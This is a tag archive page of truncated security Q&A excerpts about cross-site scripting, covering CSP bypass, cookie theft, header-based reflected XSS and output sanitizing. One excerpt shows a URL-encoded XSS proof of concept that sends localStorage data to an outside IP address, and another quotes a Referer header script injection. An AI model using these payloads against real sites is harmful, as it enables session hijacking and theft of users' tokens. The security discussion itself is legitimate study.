xss – WindowsTechs.com

Overcoming Cookie Theft Barrier in XSS Attack despite CSP Implementation

Posted on April 26, 2024 by EPiez

I have a website that includes CSP rules:
.use(
helmet.contentSecurityPolicy({
directives: {
defaultSrc: ["’self’"],
scriptSrc: [
"’self’",
"cdnjs.cloudflare.com"
],
},
})
)

… Continue reading Overcoming Cookie Theft Barrier in XSS Attack despite CSP Implementation→

Bypassing CSP and implementing XSS attack

Posted on April 25, 2024 by EPiez

I am using Content Security Policy (CSP) rules in my code to defend against XSS attacks. Here are the CSP rules I have implemented using Helmet:
.use(
helmet.contentSecurityPolicy({
directives: {
defaultSrc: ["’self’"],
scriptSrc… Continue reading Bypassing CSP and implementing XSS attack→

Is it possible to trick a user into logging in to a site, then stealing a non HttpOnly cookie that will be set after they log in?

Posted on April 11, 2024 by ETLJ

If a user has already logged in, and then the site sets a non HttpOnly cookie, then it seems possible to trick the user into doing something that would lead to the cookie being stolen.
If the cookie expires after one minute, it seems like … Continue reading Is it possible to trick a user into logging in to a site, then stealing a non HttpOnly cookie that will be set after they log in?→

Cross Site Scripting with URL protocol schema javascript

Posted on April 9, 2024 by Jack

I’m testing a web application and I found a XSS vulnerability. I can inject schemas like data:// or tel:// but they have blocked the javascript:// schema. On current browsers the origin is null if I use data:// so data:// is not good.
I ha… Continue reading Cross Site Scripting with URL protocol schema javascript→

How to sanitize $_SERVER url variables?

Posted on April 8, 2024 by rami300

An attacker used the HTTP_REFERER variable to inject Javascript by sending the following in the Header:
Referer:
javascript:alert(document.c… Continue reading How to sanitize $_SERVER url variables?→

What was the root cause of CVE-2022-0801? [closed]

Posted on April 7, 2024 by user2284570

I’m interested in CVE-2022-0801, however the report is evasive.

Inappropriate implementation in HTML parser in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to bypass XSS preventions via a crafted HTML page.

Is there any … Continue reading What was the root cause of CVE-2022-0801? [closed]→

Is There a way to exploiting / Make exploit scenario for Header based reflected XSS?

Posted on April 7, 2024 by 0xdead 4f

I’ve found a reflected XSS, but the problem is that the attack vector is the header (any header). Is there a way to develop an exploit scenario based on this?

Continue reading Is There a way to exploiting / Make exploit scenario for Header based reflected XSS?→

+ is decoded by the browser as space [closed]

Posted on March 28, 2024 by Anonymous

I am trying to poc and XSS in the url, and I have it working fine with the below url:
https://example.com:15000/test/%3Cscript%20type=%22text/javascript%22%3Edocument.location=%22http://192.168.1.88:8080/%3fc=%22+localStorage.getItem(%22to… Continue reading + is decoded by the browser as space [closed]→

Secure way to output encoding HTML for insert raw html via javascript

Posted on March 22, 2024 by The nothing

I want to be 100% secure, I create raw html this way:
const template = document.createElement(‘template’)
template.innerHTML = html_raw
const cloned = template.content.cloneNode(true)

document.querySelector(‘#app’).appendChild(cloned);

W… Continue reading Secure way to output encoding HTML for insert raw html via javascript→

Top 10 web application vulnerabilities in 2021–2023

Posted on March 12, 2024 by Oxana Andreeva, Kaspersky Security Services

Our Security assessment team set up rankings that reflected our take on the most widespread and critical web application vulnerabilities as viewed through a prism of eight years’ experience. Continue reading Top 10 web application vulnerabilities in 2021–2023→